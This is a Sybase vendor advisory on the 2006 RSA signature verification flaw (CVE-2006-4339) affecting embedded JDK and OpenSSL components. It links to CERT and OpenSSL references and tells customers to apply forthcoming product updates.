Switch to standard view 
  Sybase logo
 
 
 



Urgent from Sybase: Preliminary advisory on security vulnerability in RSA signature verification impacting several Sybase products

Summary: This document describes a situation where the implementation of RSA signature verification in SSL/TLS, or other application scenarios, may incorrectly verify forged signatures leading to security vulnerability.


Contents

This document contains the following sections:

  • Customer Alert
  • Recommendation

Customer Alert

Certain Sybase products may be vulnerable to an RSA signature verification implementation flaw that allows incorrect signatures (in X509 certificates) to be validated if the RSA public key exponent is 3. This may allow a number of different types of remote exploits based on forged certificates. For example, this may allow SSL/TLS clients to verify forged server side certificates to be valid or allow applications to verify data or code signed by forged certificates to be valid.

This issue affects multiple vendor implementations of RSA PKCS#1 v1.5 signature verification including JDK/JRE/JSSE and OpenSSL that are embedded within certain Sybase products.

Additional details on this issue are available from CERT Vulnerability VU#845620 at

http://www.kb.cert.org/vuls/id/845620

and also at

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339
http://www.openssl.org/news/secadv_20060905.txt
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1&searchclaus

More detailed information on Sybase products (using RSA signature verification) that may be affected by the vulnerabilities described above can be found in the document below.

Note: As information becomes available the following table will be updated. Please check for updates on a regular basis.

Details of affected products - Last Updated 23rd January 2007.


Recommendation

Sybase is currently working on providing final resolutions and product updates for this issue

Sybase strongly recommends that customers apply the product updates and follow product specific instructions when available

Should an EBF be required once it is available it can be obtained from the Sybase EBFs and Maintenance site.

http://downloads.sybase.com/

Follow the instructions in the EBF cover letter to install any EBF.


If you require further assistance please contact your local support center. The contact numbers can be found in the About Support section under Support & Services at the www.sybase.com website.

http://www.sybase.com/contactus/support



Copyright © 2006 Sybase, Inc. All rights reserved.



Back to Top
© Copyright 2010, Sybase Inc.